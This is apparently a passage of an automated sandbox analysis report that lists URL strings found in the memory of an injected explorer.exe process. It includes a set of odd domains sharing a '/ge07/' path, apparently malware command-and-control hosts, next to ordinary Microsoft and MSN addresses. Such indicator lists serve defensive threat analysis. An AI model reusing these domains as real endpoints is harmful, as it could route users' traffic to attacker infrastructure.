          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9net88.netReferer:
          Source: explorer.exe, 00000003.00000003.3105701317.000000000C9BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114249246.000000000C9EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1848448919.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cillascrewedsedroth.cfd
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cillascrewedsedroth.cfd/ge07/
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cillascrewedsedroth.cfd/ge07/www.ithin-ksvodn.xyz
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cillascrewedsedroth.cfdReferer:
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecurityemployment.today
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecurityemployment.today/ge07/
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecurityemployment.today/ge07/www.f7y2i9fgm.xyz
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecurityemployment.todayReferer:
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f7y2i9fgm.xyz
          Source: explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f7y2i9fgm.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f7y2i9fgm.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyz
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyz/ge07/www.iscinddocenaemlynne.cfd
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iscinddocenaemlynne.cfd
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iscinddocenaemlynne.cfd/ge07/
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iscinddocenaemlynne.cfd/ge07/www.zoc-marriage.xyz
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iscinddocenaemlynne.cfdReferer:
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ithin-ksvodn.xyz
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ithin-ksvodn.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ithin-ksvodn.xyz/ge07/www.pipagtxcorrelo.xyz
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ithin-ksvodn.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ivglass.xyz
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ivglass.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ivglass.xyz/ge07/www.pm-22-ns-2.click
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ivglass.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shop
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shop/ge07/
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shop/ge07/www.rkgexg.top
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shopReferer:
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ocockbowerlybrawer.cfd
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ocockbowerlybrawer.cfd/ge07/
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ocockbowerlybrawer.cfd/ge07/www.ool-covers76.xyz
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ocockbowerlybrawer.cfdReferer:
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ool-covers76.xyz
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ool-covers76.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ool-covers76.xyz/ge07/www.9net88.net
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ool-covers76.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pipagtxcorrelo.xyz
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pipagtxcorrelo.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pipagtxcorrelo.xyz/ge07/www.ecurityemployment.today
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pipagtxcorrelo.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pm-22-ns-2.click
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pm-22-ns-2.click/ge07/
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pm-22-ns-2.click/ge07/www.cillascrewedsedroth.cfd
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pm-22-ns-2.clickReferer:
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rkgexg.top
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rkgexg.top/ge07/
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rkgexg.top/ge07/www.ocockbowerlybrawer.cfd
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rkgexg.topReferer:
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yegle.net
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yegle.net/ge07/
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yegle.net/ge07/www.giyztm.xyz
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yegle.netReferer:
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyz
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyz/ge07/www.ivglass.xyz
          Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyzReferer:
          Source: explorer.exe, 00000003.00000000.1848448919.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000003.00000000.1841567797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000003.00000000.1841567797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000002.4135604265.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000002.4135604265.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000003.00000002.4126395633.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4125188674.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1839005711.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1840011755.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000002.4135604265.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000003.00000002.4135604265.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000003.00000002.4135604265.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
